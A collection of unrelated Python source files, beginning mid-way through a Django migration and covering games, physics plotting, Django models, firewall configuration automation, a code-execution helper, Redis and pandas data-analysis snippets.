field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='registers', to='edu.Student', verbose_name='دانش آموز'),
),
migrations.AlterField(
model_name='teacherclasscourse',
name='class_time',
field=models.CharField(max_length=100, verbose_name='زمان کلاس'),
),
migrations.AlterField(
model_name='teacherclasscourse',
name='classroom',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='teacher_class_courses', to='edu.Classroom', verbose_name='کلاس'),
),
migrations.AlterField(
model_name='teacherclasscourse',
name='course',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='teacher_class_courses', to='edu.Course', verbose_name='دزس'),
),
migrations.AlterField(
model_name='teacherclasscourse',
name='teacher',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='teacher_class_courses', to='edu.Teacher', verbose_name='معلم'),
),
]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Sep 8 17:44:53 2019
@author: Zackerman24
"""
"""For checking correct coord entry, could make sure entry is in
A - F and 1-6"""
"""Shave off extra space on any user input"""
"""Make sure coordinate entries are unique, not duplicative"""
import numpy as np
def create_battleship(game_array, player_array, player_placements):
"""Creates a user's 4-coordinate long battleship."""
coordinates = input(("\nEnter four adjacent coordinates for your Battleship"
", separated by a space: "))
split_coord = coordinates.split()
while True:
if coordinates.upper() == "EXIT":
exit()
elif len(split_coord) != 4:
print("Invalid coordinate entry. Please try again.")
coordinates = input(("\nEnter four adjacent coordinates"
"for your Battleship"
", separated only by a space: "))
split_coord = coordinates.split()
continue
else:
break
placements = []
for coord in split_coord:
raw_spot = np.where(game_array == coord)
spot = list(zip(raw_spot[0],raw_spot[1]))
placements.append(spot)
for place in placements:
place_1 = place[0]
player_placements.append(player_array[place_1[0],place_1[1]])
player_array[place_1[0],place_1[1]] = 'BS'
print(player_array)
def create_cruiser(game_array, player_array, player_placements):
"""Creates a user's 3-coordinate long cruiser."""
coordinates = input(("\nEnter three adjacent coordinates for your Cruiser"
", separated by a space: "))
split_coord = coordinates.split()
while True:
if coordinates.upper() == "EXIT":
exit()
elif len(split_coord) != 3:
print("Invalid coordinate entry. Please try again.")
coordinates = input(("\nEnter three adjacent coordinates"
"for your Cruiser"
", separated only by a space: "))
split_coord = coordinates.split()
continue
else:
break
placements = []
for coord in split_coord:
raw_spot = np.where(game_array == coord)
spot = list(zip(raw_spot[0],raw_spot[1]))
placements.append(spot)
for place in placements:
place_1 = place[0]
player_placements.append(player_array[place_1[0],place_1[1]])
player_array[place_1[0],place_1[1]] = 'CR'
print(player_array)
def create_destroyer(game_array, player_array, player_placements):
"""Creates a user's 2-coordinate long destroyer."""
coordinates = input(("\nEnter two adjacent coordinates for your Destroyer"
", separated by a space: "))
split_coord = coordinates.split()
while True:
if coordinates.upper() == "EXIT":
exit()
elif len(split_coord) != 2:
print("\nInvalid coordinate entry. Please try again.")
coordinates = input(("\nEnter two adjacent coordinates"
"for your Destroyer"
", separated only by a space: "))
split_coord = coordinates.split()
continue
else:
break
placements = []
for coord in split_coord:
raw_spot = np.where(game_array == coord)
spot = list(zip(raw_spot[0],raw_spot[1]))
placements.append(spot)
for place in placements:
place_1 = place[0]
player_placements.append(player_array[place_1[0],place_1[1]])
player_array[place_1[0],place_1[1]] = 'DT'
print(player_array)
def create_ships(game_array, player_array, player_placements):
"""Function to create all three of a players ships."""
create_battleship(game_array, player_array, player_placements)
create_cruiser(game_array, player_array, player_placements)
create_destroyer(game_array, player_array, player_placements)
def player_move(game_array, opponent_array, opponent_placements):
"""Allows a player to enter an attack coordinate."""
attack = input("\nEnter the coordinate you'd like to attack:")
if attack.upper() == "EXIT":
exit()
if attack in opponent_placements:
raw_spot = np.where(game_array == attack)
spot = list(zip(raw_spot[0],raw_spot[1]))
attack_coordinate = spot[0]
if opponent_array[attack_coordinate[0],attack_coordinate[1]] == "BS":
print("\nSuccess! You've hit your opponent's battleship.")
elif opponent_array[attack_coordinate[0],attack_coordinate[1]] == "CR":
print("\nSuccess! You've hit your opponent's cruiser.")
elif opponent_array[attack_coordinate[0],attack_coordinate[1]] == "DT":
print("\nSuccess! You've hit your opponent's destroyer.")
else:
print("We're not sure what you hit!")
opponent_placements.remove(attack)
if not opponent_placements:
print("\nCongratulations! You destroyed all your opponent's ships.")
print("The game will now shutdown.")
exit()
else:
print("Your opponent only has " + str(len(opponent_placements)) + " spots left.")
else:
print("Oops! Your attack did not strike any ships.") |
import sys
sys.path.append('C:\\Users\\nikit\\AppData\\Local\\Programs\\Python\\python38\\lib\\site-packages')
import NBodyPlotter as nbp
from NBodyPlotter import NBodySolver
from NBodyPlotter import Body
import matplotlib.pyplot as plt
import numpy as np
#Define scale values to keep close to unity
mass_scale = 1e30 #Kg
dist_scale = 1e11 #m
vel_scal = 1000 #m/s (such that inputted units are in Km/s)
orbit_period = 356*24*60*60 #s
solver = NBodySolver()
solver.SetSolverRelativeValues(mass_scale, dist_scale, vel_scal, orbit_period)
star_vel = np.sqrt(nbp.G *mass_scale/(dist_scale))/(vel_scal*2)
def Reset(solver):
solver.bodies.clear()
solver.AddBody(Body("star 1", 1, [0, -1, 0], [star_vel,0,0]))
solver.AddBody(Body("star 2", 1, [0, 1, 0], [-star_vel,0,0]))
solver.AddBody(Body("mid boi", 0.1, [0, 0, 1], [0,0,0]))
Reset(solver)
t = 10
time_span=np.linspace(0,t,t*10000)
#rBodyDist = 1e30
#solver.AddBody(nbp.CreateRogueBody(solver.bodies, rBodyDist, mass_scale, dist_scale, vel_scal))
solver.SolveNBodyProblem(time_span)
#fig = plt.figure()
#ax =fig.add_subplot(111, projection='3d')
#solver.PlotNBodySolution(ax, legend=False)
fig = plt.figure(figsize=(13, 8))
ax1 = fig.add_subplot(121, projection='3d')
ax2 = fig.add_subplot(122, projection='3d')
#ax4 = fig.add_subplot(144, projection='3d')
#star_vel = np.sqrt(nbp.G *mass_scale/(5*dist_scale))/(vel_scal*2)
t = 10
time_span=np.linspace(0,t,t*10000)
#Initiate solver
solver.SetSolverRelativeValues(mass_scale, dist_scale, vel_scal, orbit_period)
# print(star_vel)
# def Reset(solver):
# solver.bodies.clear()
# solver.AddBody(Body("star 1", 1, [0, -5, 0], [star_vel,0,0]))
# solver.AddBody(Body("star 2", 1, [0, 5, 0], [-star_vel,0,0]))
# solver.AddBody(Body("mid boi", 0.1, [0, 0, 1], [0,0,0]))
# Reset(solver)
# solver.SolveNBodyProblem(time_span)
# #solver.AnimateNBodySolution()
# solver.PlotNBodySolution(ax=ax1, show=False, legend=False)
# ax1.set_title("Halo system")
#
# Reset(solver)
#
#
#
Reset(solver)
rBodyDist = 1e45
solver.AddBody(nbp.CreateRogueBody(solver.bodies, rBodyDist, mass_scale, dist_scale, vel_scal))
solver.SolveNBodyProblem(time_span)
solver.PlotNBodySolution(ax=ax1, show=False, legend=False)
ax1.set_title("Halo system\n"+r"rogue body at $R_{rs}=$" + str(rBodyDist))
Reset(solver)
rBodyDist = 1e44
solver.AddBody(nbp.CreateRogueBody(solver.bodies, rBodyDist, mass_scale, dist_scale, vel_scal))
solver.SolveNBodyProblem(time_span)
solver.PlotNBodySolution(ax=ax2, show=False, legend=True)
ax2.set_title("Halo system\n rogue body at\n"+r"$R_{rs}=$" + str(rBodyDist))
fig.subplots_adjust(wspace=0.15)
# Reset(solver)
#
# t = 500
# time_span=np.linspace(0,t,t*10000)
#
# rBodyDist = 4.5e45
# solver.AddBody(nbp.CreateRogueBody(solver.bodies, rBodyDist, mass_scale, dist_scale, vel_scal))
# solver.SolveNBodyProblem(time_span)
# solver.PlotNBodySolution(ax=ax4, show=False, legend=False)
# ax4.set_title("halo system\n"+r"rogue body at $R_{rs}=$" + str(rBodyDist))
plt.show()
|
from src.entity.article import Article
from src.configure import environment, runTime
import json
def orgnizeJson2ArticleList(jsonStrs):
jsonDataList = json.loads(jsonStrs.decode('utf8'))
articleList = []
for jsonData in jsonDataList:
article = Article()
article.title = jsonData.get('title', '')
article.content = jsonData.get('content', '')
articleList.append(article)
return articleList
def orgnizeArticleList2Json(articleList):
resultMapList = []
for article in articleList:
resultMap = {}
for task in article.taskList:
resultMap[task] = getattr(article, runTime.TASK_ARTICLE_ATTR_MAP[task])
resultMapList.append(resultMap)
return resultMapList
|
#!/usr/bin/python3
class Edureka:
empcount=0
'''Explaining Edureka Class'''
print("Edureka. __dict__:",Edureka.__dict__)
print("Edureka. __dict__:",Edureka.__name__)
|
# This is where the answers to Chapter 9 questions for the BSS Dev RampUp go
# Name: |
import re
from django.db import models
import bcrypt
# Create your models here.
class Dog(models.Model):
name = models.CharField(max_length=10)
is_good = models.BooleanField(default=True)
img_url = models.CharField(max_length=255)
bio = models.TextField()
breed = models.CharField(max_length=15)
tricks = models.ManyToManyField('Trick', related_name='dogs')
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
class Trick(models.Model):
name = models.CharField(max_length=10)
# dogs
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
class UserManager(models.Manager):
def new_user_validator(self, post_data):
# build error dictionary
errors = {}
# check if email is already registered
potential_user_list = User.objects.filter(email=post_data['esnales'])
if len(potential_user_list) > 0:
# we have a user already
errors['esnales'] = 'A user with that email exists.'
return errors
# check if post data is long enough
if len(post_data['name']) < 3:
errors['name'] = 'Name is too short.'
if len(post_data['esnales']) < 3:
errors['esnales'] = 'Email is too short.'
EMAIL_REGEX = re.compile(
r'^[a-zA-Z0-9.+_-]+@[a-zA-Z0-9._-]+\.[a-zA-Z]+$')
# test whether a field matches the pattern
if not EMAIL_REGEX.match(post_data['esnales']):
errors['esnales'] = "Invalid email address!"
elif len(post_data['password']) < 3:
errors['password'] = 'Password is too short.'
elif(post_data['password'] != post_data['password_confirm']):
errors['password_confirm'] = 'Password does not match.'
return errors
def login_validator(self, post_data):
errors = {}
potential_user_list = User.objects.filter(email=post_data['esnales'])
if len(potential_user_list) == 0:
# we have a user already
errors['esnales'] = 'That email does not exists.'
return errors
does_password_match = bcrypt.checkpw(
post_data['password'].encode(), potential_user_list[0].password.encode())
if not does_password_match:
errors['password'] = "That password doesn't work."
return errors
class User(models.Model):
name = models.CharField(max_length=255)
email = models.CharField(max_length=255)
password = models.CharField(max_length=255)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
objects = UserManager()
|
import socket
import time
from threading import Thread
def make_request():
start_time = time.time()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('localhost', 8000))
sock.send(b'GET /\n\n')
resp = sock.recv(100)
sock.close()
end_time = time.time()
print(time.strftime("%H:%M:%S"), end_time-start_time)
from threading import Thread
def do_request_forever():
while True:
make_request()
t1 = Thread(target=do_request_forever)
t2 = Thread(target=do_request_forever)
t1.start()
t2.start()
|
#! /usr/bin/env python
"""
Program FMC and FTD using YAML file for user data.
"""
import fmcapi
import logging
from ruamel.yaml import YAML
from pathlib import Path
import argparse
def main(datafile):
"""Grab the data from the yaml file and send it to program_fmc()."""
yaml = YAML(typ="safe")
path = Path(datafile)
with open(path, "r") as stream:
try:
my_data = yaml.load(stream)
logging.info(f"Loading {path} file.")
program_fmc(data_vars=my_data, path=path)
except OSError:
logging.error(f"An error has occurred trying to open {path}.")
exit(1)
def program_fmc(data_vars, path):
"""Use values from YAML file to program the FMC. """
if "fmc" in data_vars:
# noinspection PyBroadException
try:
with fmcapi.FMC(**data_vars["fmc"]) as fmc1:
if "security_zones" in data_vars:
create_security_zones(fmc=fmc1, sz_list=data_vars["security_zones"])
else:
logging.info(
"'security_zones' section not in YAML file. Skipping."
)
if "hosts" in data_vars:
create_hosts(fmc=fmc1, na_list=data_vars["hosts"])
else:
logging.info("'hosts' section not in YAML file. Skipping.")
if "networks" in data_vars:
create_networks(fmc=fmc1, network_list=data_vars["networks"])
else:
logging.info("'networks' section not in YAML file. Skipping.")
if "access_policies" in data_vars:
create_access_policies(
fmc=fmc1, acp_list=data_vars["access_policies"]
)
else:
logging.info(
"'access_policies' section not in YAML file. Skipping."
)
if "nat_policies" in data_vars:
create_nat_policies(fmc=fmc1, nat_list=data_vars["nat_policies"])
else:
logging.info("'nat_policies' section not in YAML file. Skipping.")
if "device_records" in data_vars:
create_device_records(
fmc=fmc1, device_list=data_vars["device_records"]
)
else:
logging.info(
"'device_records' section not in YAML file. Skipping."
)
except Exception as e:
logging.error(
f"Section 'fmc' does not have the right information (bad password?)"
f" to establish a connection to FMC:"
)
logging.error(f"Error is '{e}'")
else:
logging.warning(f"No 'fmc' section found in {path}")
def create_security_zones(fmc, sz_list):
"""Create Security Zones"""
for sz in sz_list:
if "name" in sz:
sz1 = fmcapi.SecurityZones(fmc=fmc, name=sz["name"])
sz1.post()
def create_hosts(fmc, na_list):
"""Create Hosts Objects"""
for na in na_list:
if "name" in na and "value" in na:
netaddr = fmcapi.Hosts(fmc=fmc, name=na["name"], value=na["value"])
netaddr.post()
def create_networks(fmc, network_list):
"""Create Networks Objects"""
for net in network_list:
if "name" in net and "value" in net:
netaddr = fmcapi.Networks(fmc=fmc, name=net["name"], value=net["value"])
netaddr.post()
def create_access_policies(fmc, acp_list):
"""Create Access Policies and their associated AccessRules"""
for acp in acp_list:
policy = fmcapi.AccessPolicies(
fmc=fmc, name=acp["name"], defaultAction=acp["default_action"]
)
policy.post()
# Build access_rules associated with this acp.
if "rules" in acp:
for rule in acp["rules"]:
acp_rule = fmcapi.AccessRules(
fmc=fmc, acp_name=policy.name, name=rule["name"]
)
if "log_begin" in rule:
acp_rule.logBegin = rule["log_begin"]
if "log_end" in rule:
acp_rule.logEnd = rule["log_end"]
if "send_events_to_fmc" in rule:
acp_rule.sendEventsToFMC = rule["send_events_to_fmc"]
if "enabled" in rule:
acp_rule.enabled = rule["enabled"]
if "action" in rule:
acp_rule.action = rule["action"]
if "source_networks" in rule:
for sn in rule["source_networks"]:
acp_rule.source_network(action="add", name=sn["name"])
if "destination_networks" in rule:
for dn in rule["destination_networks"]:
acp_rule.destination_network(action="add", name=dn["name"])
if "source_ports" in rule:
for sp in rule["source_ports"]:
acp_rule.source_port(action="add", name=sp["name"])
if "destination_ports" in rule:
for dp in rule["destination_ports"]:
acp_rule.destination_port(action="add", name=dp["name"])
if "intrusion_policy" in rule:
acp_rule.intrusion_policy(
action="add", name=rule["intrusion_policy"]
)
""" Using SGTs isn't implemented in fmcapi yet.
if 'source_ise_sgts' in rule:
for sgt in rule['source_ise_sgts']:
acp_rule.source_ise_sgt(action='add', name=sgt['name'])
if 'destination_ise_sgts' in rule:
for sgt in rule['destination_ise_sgts']:
acp_rule.destination_ise_sgt(action='add', name=sgt['name'])
"""
acp_rule.post()
def create_nat_policies(fmc, nat_list):
"""Create Nat Policies and their rules"""
for natp in nat_list:
policy = fmcapi.FTDNatPolicies(fmc=fmc, name=natp["name"])
policy.post()
# Build nat_rules associated with this nat policy.
if "rules" in natp:
if "auto" in natp["rules"]:
for this_rule in natp["rules"]["auto"]:
autonat = fmcapi.AutoNatRules(fmc=fmc)
if "nat_type" in this_rule:
autonat.natType = this_rule["nat_type"]
if "interface_in_translated_network" in this_rule:
autonat.interfaceInTranslatedNetwork = this_rule[
"interface_in_translated_network"
]
if "original_network" in this_rule:
autonat.original_network(this_rule["original_network"])
if "source_interface" in this_rule:
autonat.source_intf(name=this_rule["source_interface"])
if "destination_interface" in this_rule:
autonat.destination_intf(
name=this_rule["destination_interface"]
)
autonat.nat_policy(name=natp["name"])
autonat.post()
if "manual" in natp["rules"]:
for this_rule in natp["rules"]["manual"]:
manualnat = fmcapi.ManualNatRules(fmc=fmc)
if "nat_type" in this_rule:
manualnat.natType = this_rule["nat_type"]
if "original_source" in this_rule:
manualnat.original_source(this_rule["original_source"])
if "translated_source" in this_rule:
manualnat.translated_source(this_rule["translated_source"])
if "source_interface" in this_rule:
manualnat.source_intf(name=this_rule["source_interface"])
if "destination_interface" in this_rule:
manualnat.destination_intf(
name=this_rule["destination_interface"]
)
if "enabled" in this_rule:
manualnat.enabled = this_rule["enabled"]
manualnat.nat_policy(name=natp["name"])
manualnat.post()
def create_device_records(fmc, device_list):
"""DeviceRecords (Registration and Interfaces)"""
for dr in device_list:
# Register this device with the FMC. Assume the device is pre-programmed to listen for the FTD registration.
ftd = fmcapi.DeviceRecords(fmc=fmc)
if "hostname" in dr:
ftd.hostName = dr["hostname"]
if "registration_key" in dr:
ftd.regKey = dr["registration_key"]
if "access_policy" in dr:
ftd.acp(name=dr["access_policy"])
if "name" in dr:
ftd.name = dr["name"]
if "licenses" in dr:
for lice in dr["licenses"]:
ftd.licensing(action="add", name=lice["name"])
# Push to FMC to start device registration.
ftd.post(post_wait_time=dr["wait_for_post"])
# Time to configure interfaces.
if "interfaces" in dr:
if "physical" in dr["interfaces"]:
for interface in dr["interfaces"]["physical"]:
int1 = fmcapi.PhysicalInterfaces(fmc=fmc, device_name=dr["name"])
if "name" in interface:
int1.get(name=interface["name"])
if "enabled" in interface:
int1.enabled = interface["enabled"]
if "interface_name" in interface:
int1.ifname = interface["interface_name"]
if "security_zone" in interface:
int1.sz(name=interface["security_zone"])
if "addresses" in interface:
if "ipv4" in interface["addresses"]:
if "static" in interface["addresses"]["ipv4"]:
int1.static(
ipv4addr=interface["addresses"]["ipv4"]["static"][
"ip"
],
ipv4mask=interface["addresses"]["ipv4"]["static"][
"bitmask"
],
)
elif "dhcp" in interface["addresses"]["ipv4"]:
int1.dhcp(
enableDefault=interface["addresses"]["ipv4"][
"dhcp"
]["enable_default"],
routeMetric=interface["addresses"]["ipv4"]["dhcp"][
"route_metric"
],
)
if "ipv6" in interface["addresses"]:
pass
int1.put()
# Any routing related to this device.
if "routing" in dr:
if "static" in dr["routing"]:
if "ipv4" in dr["routing"]["static"]:
for route in dr["routing"]["static"]["ipv4"]:
rt = fmcapi.IPv4StaticRoutes(fmc=fmc, device_name=dr["name"])
if "name" in route:
rt.name = route["name"]
if "networks" in route:
for network in route["networks"]:
if "name" in network:
rt.networks(
action="add", networks=[network["name"]]
)
if "gateway" in route:
rt.gw(name=route["gateway"])
if "interface_name" in route:
rt.interfaceName = route["interface_name"]
if "metric" in route:
rt.metricValue = route["metric"]
rt.post()
if "ipv6" in dr["routing"]["static"]:
pass
# Any NAT Policy assigned to this device.
if "nat_policy" in dr:
natp = fmcapi.PolicyAssignments(fmc=fmc)
natp.ftd_natpolicy(
name=dr["nat_policy"],
devices=[{"name": dr["name"], "type": dr["type"]}],
)
natp.post()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Specify arguments to modify program.")
parser.add_argument(
"-d",
"--datafile",
action="store",
dest="datafile",
type=str,
help="Path and filename to YAML file containing data.",
default="datafile.yml",
)
args = parser.parse_args()
main(datafile=args.datafile)
|
# Generated by Django 2.1.5 on 2019-02-26 10:20
from django.db import migrations, models
import jsonfield.fields
class Migration(migrations.Migration):
dependencies = [
('loader', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='missingobservations',
name='clean_columns',
),
migrations.RemoveField(
model_name='missingobservations',
name='clean_data',
),
migrations.RemoveField(
model_name='missingobservations',
name='missing_data',
),
migrations.AlterField(
model_name='distinctids',
name='distinct_ids',
field=models.IntegerField(blank=True, default=0, null=True),
),
migrations.AlterField(
model_name='distinctids',
name='total_ids',
field=models.IntegerField(blank=True, default=0, null=True),
),
migrations.AlterField(
model_name='distinctrows',
name='distinct_rows',
field=models.IntegerField(blank=True, default=0, null=True),
),
migrations.AlterField(
model_name='distinctrows',
name='total_count',
field=models.IntegerField(blank=True, default=0, null=True),
),
migrations.AlterField(
model_name='missingobservations',
name='missing_columns',
field=jsonfield.fields.JSONField(blank=True, null=True),
),
]
|
from .vec3 import Vec3
class BlockEvent:
"""An Event related to blocks (e.g. placed, removed, hit)"""
HIT = 0
def __init__(self, type, x, y, z, face, entityId):
self.type = type
self.pos = Vec3(x, y, z)
self.face = face
self.entityId = entityId
def __repr__(self):
sType = {
BlockEvent.HIT: "BlockEvent.HIT"
}.get(self.type, "???")
return "BlockEvent(%s, %d, %d, %d, %d, %d)"%(
sType,self.pos.x,self.pos.y,self.pos.z,self.face,self.entityId);
@staticmethod
def Hit(x, y, z, face, entityId):
return BlockEvent(BlockEvent.HIT, x, y, z, face, entityId)
class ChatEvent:
"""An Event related to chat (e.g. posts)"""
POST = 0
def __init__(self, type, entityId, message):
self.type = type
self.entityId = entityId
self.message = message
def __repr__(self):
sType = {
ChatEvent.POST: "ChatEvent.POST"
}.get(self.type, "???")
return "ChatEvent(%s, %d, %s)"%(
sType,self.entityId,self.message);
@staticmethod
def Post(entityId, message):
return ChatEvent(ChatEvent.POST, entityId, message)
class ProjectileEvent:
"""An Event related to projectiles (e.g. placed, removed, hit)"""
HIT = 0
def __init__(self, type, x, y, z, face, originName, targetName):
self.type = type
self.pos = Vec3(x, y, z)
self.face = face
self.originName = originName
self.targetName = targetName
def __repr__(self):
sType = {
ProjectileEvent.HIT: "ProjectileEvent.HIT"
}.get(self.type, "???")
return "ProjectileEvent(%s, %d, %d, %d, %d, %s, %s)"%(
sType,self.pos.x,self.pos.y,self.pos.z,self.face,self.originName,self.targetName)
@staticmethod
def Hit(x, y, z, face, originName, targetName):
return ProjectileEvent(BlockEvent.HIT, x, y, z, face, originName, targetName)
|
import base64
from subprocess import Popen, PIPE
import threading
import os
from time import time
from hashlib import sha256
_author__ = 'Ritwik'
def thread_create(pr_func):
import Queue
def func_wrapper(pr_queue, *args):
func_result = pr_func(*args)
pr_queue.put(func_result)
def thread_wrap(*args):
pr_queue = Queue.Queue()
pr_thread = threading.Thread(
target=func_wrapper,
args=(pr_queue,) + args)
pr_thread.result_queue = pr_queue
return pr_thread
return thread_wrap
class LanguageInstance:
def __init__(self, working_directory, file_extension, comp_command, exec_command):
# Setup parameters
self.default_working_directory = working_directory
self.file_extension = file_extension
self.comp_command = comp_command
self.exec_command = exec_command
self.pr_info = {}
def program_setup(self, program_text, working_directory):
# Generate program ID and filename
self.pr_info['id'] = str(int(time())) + sha256(os.urandom(16)).hexdigest()
self.pr_info['filename'] = self.pr_info['id'] + "." + self.file_extension
# Create paths for directory and file
self.pr_info['dir'] = os.path.join(
working_directory,
self.file_extension + self.pr_info['id'])
self.pr_info['path'] = os.path.join(
self.pr_info['dir'],
self.pr_info['filename'])
os.mkdir(self.pr_info['dir'])
program_file_handler = open(self.pr_info['path'], "w+")
program_file_handler.write(program_text)
program_file_handler.close()
del program_file_handler
return self.pr_info
@thread_create
def run_command(self, pr_command, pr_input="", pr_arg="filename"):
print "In run command: " + pr_command
print pr_command + " " + self.pr_info[pr_arg]
print self.pr_info['dir']
os.chdir(self.pr_info['dir'])
print os.listdir(".")
self.pr_info['instance'] = Popen([pr_command,
self.pr_info[pr_arg]],
stdout=PIPE,
stdin=PIPE,
stderr=PIPE,
shell=True)
print "COMMAND RUN"
if pr_input is not "":
self.pr_info['instance'].stdin.write(pr_input)
self.pr_info['output'] = self.pr_info['instance'].communicate()
return self.pr_info
|
from redis import Redis
redis_connection = Redis(db=1, decode_responses=True)
list_key = "example-list"
redis_connection.rpush(list_key, 1, 2, 3, 4, 5)
print(redis_connection.lrange(list_key, 0, -1)) |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Feb 15 12:14:45 2020
@author: adeela
"""
'''
https://opensource.com/article/18/3/loop-better-deeper-look-iteration-python
https://nedbatchelder.com/blog/201608/breaking_out_of_two_loops.html
https://www.youtube.com/watch?v=u8g9scXeAcI
'''
# =============================================================================
# How can we avoid Nested loops
# =============================================================================
|
import pygame
from pygame.locals import *
import pygame.mixer
import serial
import time
#portStr = '\dev\ttyACM0'
#arduino = serial.Serial('/dev/ttyACM0', 9600)
pygame.display.set_mode((120, 120), DOUBLEBUF | HWSURFACE)
pygame.init()
pygame.mixer.init()
snare = pygame.mixer.Sound('snare.wav')
crash = pygame.mixer.Sound('crash.wav')
kick = pygame.mixer.Sound('kick.wav')
while True:
events = pygame.event.get()
for event in events:
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_LEFT:
snare.play()
#print 'a'
elif event.key == pygame.K_RIGHT:
crash.play()
#print 'b'
elif event.key == pygame.K_UP:
kick.play()
#print 'c'
|
# Definition for a binary tree node.
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def isSymmetric(self, root: TreeNode) -> bool:
return self.isMirror(root, root)
def isMirror(self, t1: TreeNode, t2: TreeNode):
if t1 is None and t2 is None:
return True
if t1 is None or t2 is None:
return False
return (t1.val == t2.val) and self.isMirror(t1.right,t2.left) and self.isMirror(t1.left,t2.right)
# Tree Node
# 3
# / \
# 9 9
# / \ / \
# 7 6 6 7
# / \
# 11 11
root = TreeNode(3)
root.left = TreeNode(9)
root.left.left = TreeNode(7)
root.left.right = TreeNode(6)
root.left.right.left = TreeNode(11)
root.right = TreeNode(9)
root.right.left = TreeNode(6)
root.right.right = TreeNode(7)
root.right.left.right = TreeNode(11)
result = Solution().isSymmetric(root)
print(result) |
default_config = {
# buffer bounds for first cull of objects not on chip
# in arcsec
'bounds_buffer_uv': 16.0,
# allowed values in the bitmask image
'bitmask_allowed': 0,
# cutout types in addition to 'image'. Allowed values are
# ['weight','seg','bmask']
'cutout_types': [],
# default output data types for images
'image_dtype':'f4',
'weight_dtype':'f4',
'seg_dtype':'i4',
'bmask_dtype':'i4',
}
|
# -*- coding: utf-8 -*-
import os
os.getcwd() #获取当前工作目录
os.chdir('D:\python_learning') #修改当前工作目录
import pandas as pd
from pandas import Series,DataFrame
import matplotlib.pyplot as plt
#字符串处理
import re
text = "foo bar\t baz \tqux"
re.split('\s+',text)
#列出字符串中包含了某些字符的项目
#flmData[flmData['rflfln'].str.contains('CA_CPDBAG_2016082')]
import json
db = json.load(open('D:\python_learning\pydata-book\ch07\\foods-2011-10-03.json'))
nutrients = DataFrame(db[0]['nutrients'])
from datetime import datetime
from datetime import timedelta
df = DataFrame({'key1':['a','a','b','b','a'],
'key2':['one','two','one','two','one'],
'data1':np.random.randn(5),
'data2':np.random.randn(5)})
people = DataFrame(np.random.randn(5,5),
columns=['a','b','c','d','e'],
index=['Joe','Steve','Wes','Jim','Travis'])
tips = pd.read_csv('D:\python_learning\pydata-book\ch08\\tips.csv')
fec = pd.read_csv('D:\python_learning\pydata-book\ch09\P00000001-ALL.csv')
unames = ['user_id','gender','age','occupation','zip']
users = pd.read_table('D:\python_learning\pydata-book\ch02\movielens\users.dat',sep='::',header=None,names=unames)
rnames = ['user_id','movie_id','rating','timestamp']
ratings = pd.read_table(u'D:\python_learning\pydata-book\ch02\movielens\\ratings.dat',sep='::',header=None,names=rnames)
mnames=['movie_id','title','genres']
movies = pd.read_table('D:\python_learning\pydata-book\ch02\movielens\movies.dat',sep='::',header=None,names=mnames)
x = [1,2,3,4]
x = datetime.strptime('20161015','%Y%m%d')
y = datetime.strptime('20161021','%Y%m%d')
z = y - x
z.days
import pandas.io.data as web
import survey
'''
怀孕人口统计
'''
#解析人口数据形成DF
y =pd.read_fwf('code\\2002FemPreg.dat',colspecs=[(0,12),(21,22),(55,56),(56,58),(58,60),(274,276),(276,277),(277,279),(283,287),(422,440)],header=None,names=['caseid','nbrnaliv','babysex','birthwgt_lb','birthwgt_oz','prglength','outcome','birthord','agepreg','finalwgt'],index_col=0,converters={'caseid':int,'nbrnaliv':int,'babysex':int})
y.groupby(['outcome'])['outcome'].apply(lambda x: 100.*x.count()/y.shape[0])
x =y[y.agepreg.notnull()].agepreg
bins=[500,1800,2500,3500,4000,4500]
cats = pd.cut(x,bins)
pd.value_counts(cats).map(lambda x: 100.*x/cats.size)
#区分第一胎和非第一胎进行统计
z = [0,1,10]
group_names = ['第一胎','非第一胎']
x =pd.cut(y.birthord,z,labels=group_names)
y.groupby(['prglength',x])['prglength'].count()
y.groupby(['prglength',x])['prglength'].count().unstack().plot(kind='bar')
#归一化
z = y.groupby(x).apply(lambda x: 1. * x.groupby('prglength')['prglength'].count()/x.prglength.count())
#归一化后差值计算
z = z.loc[slice(None),35:45].unstack(level=0)
z.apply(lambda x: x.ix['第一胎'][0]-x.ix['非第一胎'][0],axis=1)
#分类查询出生早中晚
z = [0,37,40,100]
group_names = ['早','准','晚']
y1 = y[y.birthord.notnull()]
x =pd.cut(y1.prglength,z,labels=group_names)
z = y1.groupby(x).apply(lambda x: 1. * x['prglength'].count()/y1.prglength.count())
def test():
c = arange(30,45)
d = []
for x in c:
a = y1[(y1.prglength==x) & (y1.outcome==1)]['prglength'].count()
b = y1[(y1.prglength>=x) & (y1.outcome==1)]['prglength'].count()
d.append(1.*a/b)
return d
y.groupby(x).apply(lambda x: x.groupby('birthwgt_oz')['birthwgt_oz'].count()/x.birthwgt_oz.count()).loc[slice(None),0:20].unstack(level=0).plot()
'''
汽车的统计
'''
v = pd.read_csv('data\\vehicles\\vehicles.csv')
l =pd.read_table('data\\vehicles\\varlabels.txt',sep=' - ',header=None)
v.groupby('year')['year'].count().plot() #看看每年有多少数据
(v.groupby('fuelType')['fuelType'].count()/v.fuelType.count()).sort_values().plot(kind='barh')
#汽车增压充电器
vx = v.fillna('NaN')
vx.groupby(['year','sCharger'])['sCharger'].count().unstack(level=1).plot()
'''
概率分布
'''
#CDF分布
y=pd.Series(np.random.normal(0,1000,1000))
y = d.groupby(['RCKMON','RCKFLN'])['RCKFLN'].count().unstack(0)[201604]
y1 = d.groupby(['RCKMON','RCKFLN'])['RCKFLN'].count().unstack(0)[201605]
y3 = d.groupby(['RCKMON','RCKFLN'])['RCKFLN'].count().unstack(0)[201606]
def cdf(group):
df = pd.DataFrame()
for y in group:
x =y.sort_values().rank(method='first')/y.size
x.index = y.sort_values()
